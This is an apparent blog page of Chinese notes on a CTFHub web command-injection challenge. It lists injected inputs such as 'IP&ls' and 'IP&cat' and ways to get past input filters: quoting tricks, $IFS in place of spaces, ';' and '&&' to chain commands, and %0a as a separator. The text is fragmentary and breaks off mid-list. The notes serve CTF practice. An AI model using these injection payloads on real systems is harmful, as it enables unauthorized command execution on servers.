E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
(∪.∪ )...zzz
CTFHUB-WEB-RCE【08】命令注入
命令注入
源代码用IP传入
IP&ls 查看文件
IP&cat 查看内容
过滤cat
使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过
过滤空格
`$IFS` `$IFS$9` 重定向符`<`
过滤目录分隔符
; && 执行多条命令
过滤运算符
;
综合过滤练习
%0a
命令注入
源代码用IP传入
IP&ls 查看文件
1.1
.1
.1
&
ls
IP&cat 查看内容
1.1
.1
.1
&
cat
7096156205265.
php
过滤cat
使用
\
''
""